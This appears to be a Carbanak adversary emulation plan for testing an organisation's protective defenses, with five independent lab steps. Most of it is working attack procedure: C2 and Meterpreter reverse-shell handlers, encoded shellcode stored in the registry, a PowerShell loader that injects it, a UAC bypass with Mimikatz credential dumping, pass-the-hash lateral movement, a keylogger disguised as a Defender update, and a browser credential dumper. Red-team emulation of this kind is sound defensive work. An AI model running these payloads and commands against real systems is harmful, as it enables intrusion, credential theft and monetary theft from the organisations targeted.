# Scenario 2

# Preface

For the purpose of this emulation plan, Carbanak operations have been separated into 2 scenarios (detections and protections), with steps and granular procedures contained within each. This division enables users to separately test detection and protection capabilities of their defenses. Within each scenario, operations have been broken into specific objectives, which are presented linearly.

While in Scenario 1 each objective enables subsequent objectives, Scenario 2 is designed such that each objective is run independently of any other. Specifically, this scenario is intended to be used in an environment that has protective/preventative defense measures enabled. That said, each organization can tailor this emulation to their individual use case, priorities, and available resources.

This emulation plan contains several placeholder values that are meant to be replaced with values specific to the target environment against which this plan is to be run. For ease of use, a script has been included to automatically make these substitutions, found here.

# Overview

  • Emulation of Carbanak usage of tools such as Carbanak malware, Mimikatz, and PsExec.
  • Scenario begins after delivery of a reverse shell payload distributed via spearphishing
  • Targeted attack of a financial institution with the explicit goal of monetary theft
  • Split into distinct steps that can be run independently of other steps
  • Designed to assess protective/preventative defense measures

# Contents

  • Step 1 - Initial Access & Collection
  • Step 2 - Registry Shellcode and Discovery
  • Step 3 - Credential Dumping
  • Step 4 - Lateral Movement
  • Step 5 - Credential Access

# Pre-requisites

Prior to beginning the following emulation Scenario, ensure you have the proper infrastructure requirements and configuration in place as stated in the Scenario 2 Infrastructure documentation.

# Test 1: Initial Access with Embedded VBE in Word Document

The scenario begins with an initial breach, where a legitimate user opens a Word document and clicks on (T1204 / T1204.002) an embedded OLE object, causing an encoded (T1027) Visual Basic script contained within the object to execute (T1059.005).

On execution, this script decodes (T1140) and writes two files to disk, starter.vbs and TransBaseOdbcDriver.js. The script then executes starter.vbs, which in turn executes TransBaseOdbcDriver.js (T1059.007). TransBaseOdbcDriver.js is a RAT that establishes encrypted (T1563.002) command and control with the attacker over HTTP/S (TCP 443) (T1071.001).

The attacker then executes several discovery scripts that are part of the RAT, which gather information such as device hostname, username, domain (T1033), CPU architecture (T1082), and currently running processes (T1057). These scripts obtain this information by making WMI queries (T1047) and querying ActiveX networking attributes.

Finally, the attacker uploads (T1105) and executes a PowerShell script (T1086), which takes a screenshot of the user's desktop (T1113) and writes the screenshot to disk. The attacker then downloads the resulting screenshot over the existing C2 channel (T1041).

This step consists of behaviors found in Steps 0, 1, and 2 of Scenario 1.

# Procedures

# 1.A - Start C2 Server

On the Attack Platform:

  1. Start a new tmux session

    tmux

  2. Start the C2 Server

    cd carbanak/Resources/utilities/carbanak_c2server/c2server
sudo ./c2server.elf -lhost 0.0.0.0:443 -ssl

# 1.B - User Execution: Malicious File (using Microsoft Word) (T1204.002)

If testing with Microsoft Word, perform the following. If not, perform Step 1.B* instead.

On the Attack Platform:

  1. Open a new tmux terminal

    Ctrl+b c

  2. Copy 1-list.rtf to <domain_admin>'s Desktop on hrmanager.

    sudo smbclient -U '<domain_full>\<domain_admin>' //<hrmanager_ip>/C$ -c "put carbanak/Resources/step1/1-list.rtf Users\\<domain_admin>.<domain>\\Desktop\\1-list.rtf"

    Provide <domain_admin>'s password when prompted:

    <domain_admin_password>

On hrmanager:

  1. Login to victim workstation as <domain_admin>

    xfreerdp +clipboard /u:"<domain_admin>@<domain_full>" /p:"<domain_admin_password>" /v:<hrmanager_ip>

  2. Double-click 1-list.rtf located on <domain_admin>'s desktop

  3. Decline any spurious prompts, including updating document with linked data

  4. Double click the text that says "Double Click Here To Unlock"

  5. When prompted to run a script, click 'open'

  6. Click "ok" when the fake error message displays

You should receive a callback on the C2 server.

# 1.B* - User Execution: Malicious File (without using Microsoft Word)

Perform the following on hrmanager if you're testing without Office licenses:

On the Attack Platform:

  1. Open a new tmux terminal

    Ctrl+b c

  2. Copy drop_payloads.vbe to hrmanager

    sudo smbclient -U '<domain_full>\<domain_admin>' //<hrmanager_ip>/C$ -c "put carbanak/Resources/step1/drop-payloads.vbe Users\\<domain_admin>.<domain>\\Desktop\\drop-payloads.vbe"

    Provide <domain_admin>'s password when prompted:

    <domain_admin_password>

On hrmanager:

  1. Login to victim workstation as <domain_admin>

    xfreerdp +clipboard /u:"<domain_admin>@<domain_full>" /p:"<domain_admin_password>" /v:<hrmanager_ip>

  2. Open cmd.exe

  3. Manually execute VB script

    [hrmanager CMD]> cscript.exe C:\Users\<domain_admin>.<domain>\Desktop\drop-payloads.vbe

  4. Make sure you click the 'ok' on the error message box! If you don't, the payload won't execute!

# 1.C - Local Discovery (T1033, T1082, T1057)

On the Attack Platform:

  1. Switch back to the Carbanak C2 server tmux window

  2. Get system information

    (ATT&CK Evals)> enum-system

# 1.D - Screen Capture (T1113)

  1. Upload screenshot script

    (ATT&CK Evals)> upload-file /home/<attacker>/Enterprise/carbanak/Resources/step2/take-screenshot.ps1 "C:\\Users\\<domain_admin>.<domain>\\AppData\\Roaming\\TransbaseOdbcDriver\\screenshot__.ps1"

  2. Take Screenshot

    (ATT&CK Evals)> exec-cmd "powershell.exe C:\\Users\\<domain_admin>.<domain>\\AppData\\Roaming\\TransbaseOdbcDriver\\screenshot__.ps1"

  3. Exfil screenshot file over existing C2 channel

    (ATT&CK Evals)> download-file "C:\\Users\\<domain_admin>.<domain>\\AppData\\Roaming\\TransbaseOdbcDriver\\screenshot__.png" /tmp/screenshot__.png

  4. Switch to the other tmux terminal

    Ctrl-b + n

  5. Verify "screenshot__.png" download worked

    <attacker>@<attack_platform>>:~$ ls /tmp/

  6. Exit tmux Window

    exit

  7. Kill current session from C2 server

    (ATT&CK Evals)> exec-cmd taskkill /F /IM wscript.exe

  8. Exit C2 Server

    (ATT&CK Evals)> exit

  9. Close tmux session

    tmux kill-session

  10. Close hrmanager RDP session

# Cited Intelligence

  • Carbanak has created DOCX and RTF files with malicious files embedded in the documents. The user will click on an image which drops a VBS and builds a JScript RAT13

# Test 2: Registry Shellcode and Execution

The attacker prepares and deploys a second stage RAT on the victim. First, they write obfuscated (T1027) shellcode to the Windows Registry using reg.exe (T1112).

The attacker then executes a PowerShell blob (T1059.001) that reads the shellcode from the registry (T1012), decodes and decrypts it (T1140), and then finally injects the shellcode into the current PowerShell process, executing it via a call to CreateThread (T1055). After execution, the attacker receives a callback over TCP port 8080 (T1571).

With this new 2nd stage RAT, the attacker examines local files in <domain_admin>'s home directory (T1083). The attacker then calls the Get-NetComputer function from the PowerView library, which queries Active Directory objects to return a list of hostnames in the current domain (T1018). The attacker then executes Find-LocalAdminAccess, also from PowerView, to confirm that the attacker has administrator access on the current workstation (T1069).

This step consists of behaviors found in Steps 3 and 4 of Scenario 1.

# Procedures

# 2.A - Start C2 Handler

On the Attack Platform:

  1. Start Metasploit

    sudo msfconsole

  2. Set up TCP listener for Meterpreter on TCP port 8080

    use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lport 8080
set lhost 192.168.0.4
set ExitOnSession False
exploit -j

# 2.B - Stage 2nd stage RAT (T1112)

On hrmanager:

  1. Login to victim workstation as <domain_admin>

    xfreerdp +clipboard /u:"<domain_admin>@<domain_full>" /p:"<domain_admin_password>" /v:<hrmanager_ip>

  2. Open Administrative PowerShell

  3. Write shellode to Registry

    Note that the shellcode is:

    • encrypted: XOR with key 'xyz'
    • compressed: Gzip
    • encoded: base64
    • designed to connect back to 192.168.0.4
    REG ADD "HKCU\Software\InternetExplorer\AppDataLow\Software\Microsoft\InternetExplorer" /v "{018247B2CAC14652E}" /t REG_SZ /d H4sIAJEshl4C/2sx/Dmnc9KWyqoKC21LTQ1NfSPP1fIGnzQkDD9qJRp91o4y+MShYVh63tjA1GOzgceuK67SLNVhERa7N5ZYV+6YMVXbWhOoMvKjlatR5UqZn4xJxdWlf7mrKio//vgIJI3+7uSTN6xeofnRINHus2WUYcWq2fpG7RusP/t+MqhYAzUTaprTDJ5ukyqzmEJ7xxX8CxSB6uOA6uUsPpYYAtlpQLblp7oPQNMslCwVVRSVrRUslC2VjX5PjbLUbp2haK2obPQ5e7JxW2u7ivExPk4vNU+vyipLfeOP841+Tr1VWVll+GG+4dGKirRXOy5W1VjoGX6YZ/Kh2/KwGX98bfsas4+ThSorqioUrA8F/BKubF0rXGCprqVh4r3RxHuHYesOw8+7wOROiwOTypbOaFtv8GGvUKa1gunnWYafGy0OPLzDJ9m2HujfIoPWbTzzJ7wCef/31CyDDzOA3hSqtVYAK6tasEm9bf3vxio2HaPfe6PUPvQIWVorClZlAJ2qaPSx28hzg/UhxXvac1rXGn7ebfB5P9ABBp87DD8vQtXOGqhkqacsUGlVUWmtIFylZHGgOKzUo229PtD9PCKmEq1rgc6Y4Nbe1mpQsdMgYI/Bnx7es9bt85SEKpUN9+3oOHNDr209AOpTVHH+AQAA

# 2.C - Execute 2nd stage RAT (T1012, T1055)

  1. In the PowerShell window, copy, paste, and run the following PowerShell Blob to execute the Registry shellcode:

    $Signature = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@
$WinObj = Add-Type -memberDefinition $Signature -Name "Win32" -namespace Win32Functions -passthru
$key = [System.Text.Encoding]::UTF8.GetBytes("xyz")
$Payload = (Get-ItemProperty -Path HKCU:\Software\InternetExplorer\AppDataLow\Software\Microsoft\InternetExplorer).'{018247B2CAC14652E}'
$bytes = [System.Convert]::FromBase64String($Payload)
$in = New-Object System.IO.MemoryStream( , $bytes )
$output = New-Object System.IO.MemoryStream
$sr = New-Object System.IO.Compression.GzipStream $in, ([IO.Compression.CompressionMode]::Decompress)
$sr.CopyTo($output)
$sr.Close()
$in.Close()
[byte[]] $byteOutArray = $output.ToArray()
[byte[]]$decrypted = @()
for ($i = 0; $i -lt $byteOutArray.Length; $i++) {
    $decrypted += $byteOutArray[$i] -bxor $key[$i % $key.Length]
}
$WinMem = $WinObj::VirtualAlloc(0,[Math]::Max($decrypted.Length,0x1000),0x3000,0x40)
[System.Runtime.InteropServices.Marshal]::Copy($decrypted,0,$WinMem,$decrypted.Length)
$WinObj::CreateThread(0,0,$WinMem,0,0,0)

On the Attack Platform:

  1. Interact with new Meterpreter session

    msf > sessions -i 1

  2. Check Meterpreter session status

    meterpreter > getpid

# 2.D - Local and Domain Discovery (T1083, T1018, T1069)

  1. Look for files in user home directory

    meterpreter > ls C:\\Users\\<domain_admin>.<domain>\\

  2. Load PowerShell into memory

    meterpreter > load powershell

  3. Import PowerView into memory

    meterpreter > powershell_import /home/<attacker>/Enterprise/carbanak/Resources/step6/powerview.ps1

  4. Execute PowerView's Get-NetComputer from memory

    meterpreter > powershell_execute Get-NetComputer

  5. Execute PowerView's Find-LocalAdminAccess from memory and write its output to a file on disk

    meterpreter > powershell_execute "Find-LocalAdminAccess | Out-File C:\\Users\\<domain_admin>.<domain>\\AppData\\Roaming\\TransbaseOdbcDriver\\admin.txt"

    You will likely see an error:

    Error running command powershell_execute: Rex::TimeoutError Operation timed out.

    That's okay - don't freak out!

    Meterpreter thinks the script timed out, but it is still running in the background.

    Wait 60 seconds to allow the script to finish.

  6. Read the contents of the output file

    meterpreter > cat C:\\Users\\<domain_admin>.<domain>\\AppData\\Roaming\\TransbaseOdbcDriver\\admin.txt

  7. Exit the Meterpreter session

    meterpreter > exit

  8. Exit Metasploit

    msf > exit

  9. Close hrmanager RDP session

# Cited Intelligence

  • Carbanak is known to rely on Powershell to execute custom scripts and download 2nd stage RATs.4,6
  • Carbanak will employ multiple methods of obfuscation to conceal their activities.1

# Test 3: UAC Bypass and Credential Dumping

The attacker uploads two files (T1105) to perform credential dumping: rad353F7.ps1 (UAC bypass) and smrs.exe (customized Mimikatz, called ATTACKKatz in this repository). The attacker executes rad353F7.ps1 via PowerShell (T1059.001), which in turn executes smrs.exe in high integrity (T1549.002). smrs.exe dumps plaintext credentials for the current user (T1003.001).

FAQ About ATTACKkatz.exe

attackkatz (smrs.exe in step 4.B) leverages the Logonpasswords functionality of Mimikatz to obtain passwords. This dumps LSASS memory to obtain credentials for users on the domain that have logged in to this machine (T1003.001).

This step consists of behaviors found in Step 4 of Scenario 1.

# Procedures

# 3.A - UAC Bypass and Credential Dumping (T1549.002, T1003.001)

On hrmanager:

  1. Login to victim workstation as <domain_admin>

    xfreerdp +clipboard /u:"<domain_admin>@<domain_full>" /p:"<domain_admin_password>" /v:<hrmanager_ip>

  2. Confirm that the following path is present via file explorer:

    C:\Users\<domain_admin>.<domain>\AppData\Roaming\TransbaseOdbcDriver\

    If not, create it with CMD:

    mkdir C:\Users\<domain_admin>.<domain>\AppData\Roaming\TransbaseOdbcDriver\

On the Attack Platform:

  1. Upload UAC Bypass script to hrmanager

    sudo smbclient -U '<domain_full>\<domain_admin>' //<hrmanager_ip>/C$ -c "put /home/<attacker>/Enterprise/carbanak/Resources/step4/uac-bypass.ps1 Users\\<domain_admin>.<domain>\\AppData\\Roaming\\TransbaseOdbcDriver\\rad353F7.ps1"

    Use <domain_admin>'s password when prompted.

    <domain_admin_password>

  2. Upload Mimikatz (custom) to hrmanager

    sudo smbclient -U '<domain_full>\<domain_admin>' //<hrmanager_ip>/C$ -c "put /home/<attacker>/Enterprise/carbanak/Resources/step4/attackkatz.exe Users\\<domain_admin>.<domain>\\AppData\\Roaming\\TransbaseOdbcDriver\\smrs.exe"

Back on hrmanager:

  1. Execute the UAC Bypass script from a PowerShell window:

    cd C:\Users\<domain_admin>.<domain>\AppData\Roaming\TransbaseOdbcDriver\
.\rad353F7.ps1

  2. Read Mimikatz output

    Get-Content "C:\\Users\\<domain_admin>.<domain>\\AppData\\Roaming\\TransbaseOdbcDriver\\MGsCOxPSNK.txt"

  3. Close all windows on hrmanager and close the RDP session

# Cited Intelligence

  • The Carbank malware contains a UAC bypass. 16
  • Carbanak is known to use Mimikatz to facilitate privilege escalation.6,8

# Test 4: Lateral Movement via Pass-the-Hash

The attacker uses PsExec.py, providing a password hash for authentication (T1550), to gain a shell on the DC from bankfileserver (T1569.002, T1021.002). They then upload and execute a second stage payload, Tiny.exe, over this SMB channel to receive a more powerful shell.

This step consists of behaviors found in Step 5 of Scenario 1.

# 4.A - Lateral Movement via PsExec + Pass-the-Hash (T1569.002, T1550)

On the Attack Platform:

  1. Start tmux if it is not already started

    tmux

  2. Start Metasploit

    sudo msfconsole

  3. Set up TCP listener for Meterpreter on TCP port 8080

    use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lport 8080
set lhost 192.168.0.4
set ExitOnSession False
exploit -j

  4. Open a new tmux terminal

    Ctrl+b c

  5. Copy needed files to the local staging folder (/tmp/)

    cp ~/Enterprise/carbanak/Resources/step5/impacket_exe /tmp/runtime
cp ~/Enterprise/carbanak/Resources/step5/psexec.py /tmp/
cp ~/Enterprise/carbanak/Resources/step5/tiny.exe /tmp/
cd /tmp/

  6. SCP those files to bankfileserver

    scp runtime psexec.py tiny.exe <domain_admin>@<bankfileserver_ip>:/tmp/

    Enter <domain_admin>'s password when prompted:

    <domain_admin_password>

  7. SSH into bankfileserver as <domain_admin>

    ssh <domain_admin>@<bankfileserver_ip>

    Enter <domain_admin>'s password when prompted:

    <domain_admin_password>

  8. Change to the tmp directory on bankfileserver

    <domain_admin>@bankfileserver:~$ cd /tmp/

  9. Modify permissions on runtime to make it world-executable

    <domain_admin>@bankfileserver:~$ chmod 755 /tmp/runtime

  10. Use runtime to execute psexec.py with the <domain_admin>'s password hash to connect to bankdc

    ./runtime psexec.py <domain_full>/<domain_admin>@<bankdc_ip> -hashes <domain_admin_password_ntlm_hash>

    You should have a shell on the domain controller now.

# 4.B - Lateral Tool Transfer and Execution (T1570)

  1. Serve TinyMet over SMB

    From pass-the-hash shell:

    [bankdc CMD]> put tiny.exe

  2. Execute TinyMet

    [bankdc CMD]> start /b C:\Windows\tiny.exe 192.168.0.4 8080

  3. Switch back to the Metasploit tmux terminal

    Ctrl+b n

  4. Interact with the new Tiny.exe Meterpreter session

    sessions -i 1

  5. Verify the session works

    meterpreter > getpid

  6. Close Meterpreter

    meterpreter > exit

  7. Exit Metasploit

    msf > exit

  8. Switch to psexec shell

    Ctrl+b n

  9. Exit psexec shell

    [bankdc CMD]> exit

  10. Exit bankfileserver SSH session

    <domain_admin>@bankfileserver:~$ exit

  11. Exit tmux session

    tmux kill-session

# Cited Intelligence

  • Carbanak is known to use psexec, or other variations, to perform lateral movement and execute remote commands.6
  • Carbanak is known to use TinyMet as a stager to execute Meterpreter as a stage 1 RAT.3

# Test 5: Credential Access

The attacker collects information needed to wire money to illicit accounts. The attacker performs keylogging (T1056.001) to monitor the CFO user's behavior, after which they steal the user's credentials from their web browser (T1555.003).

This step consists of behaviors found in Step 9 of Scenario 1.

# Procedures

# 5.A - User Monitoring - (T1056.001)

On the Attack Platform:

  1. Upload the keylogger to the cfo workstation

    sudo smbclient -U '<domain_full>\<domain_admin>' //<cfo_ip>/C$ -c "put /home/<attacker>/Enterprise/carbanak/Resources/step9/keylogger.exe Users\\<cfo_user>\\AppData\\Local\Temp\\DefenderUpgradeExec.exe"

    Enter <domain_admin>'s password when prompted:

    <domain_admin_password>

On cfo:

  1. Login to the cfo workstation as the <cfo_user>

    xfreerdp +clipboard /u:"<cfo_user>@<domain_full>" /p:"<cfo_user_password>" /v:<cfo_ip>

  2. Open a PowerShell window

  3. Execute the keylogger

    cd $env:TEMP
start-process .\DefenderUpgradeExec.exe -WindowStyle Hidden

  4. Mimic user behavior

    1. Open Edge, go to finance.yahoo.com

2. Open Payment Transfer System

3. Enter "ATT&CK EVALS" in the box that sayd "Widgets Inc"

  5. Open cmd.exe and kill keylogger

    taskkill /F /IM DefenderUpgradeExec.exe
exit

  6. Switch to PowerShell window and view keylogger dump

    get-content klog2.txt

# 5.B - Credentials from Web Browsers (T1070.004)

On the Attack Platform:

  1. Upload the Web Credential Dumper to the cfo workstation

    sudo smbclient -U '<domain_full>\<domain_admin>' //<cfo_ip>/C$ -c "put /home/<attacker>/Enterprise/carbanak/Resources/step9/dumpWebCreds.exe Users\\<cfo_user>\\AppData\\Local\\Temp\\infosMin48.exe"

    Enter <domain_admin>'s password when prompted:

    <domain_admin_password>

On the cfo workstation:

  1. Run the Web Cred Dumper from PowerShell

    .\infosMin48.exe

  2. Close PowerShell window

  3. Close RDP session

# Cited Intelligence

  • Carbanak is known to deploy software that can monitor a user's keystrokes.6
  • Carbanak has tools that are built for collecting credentials from browsers and applications.11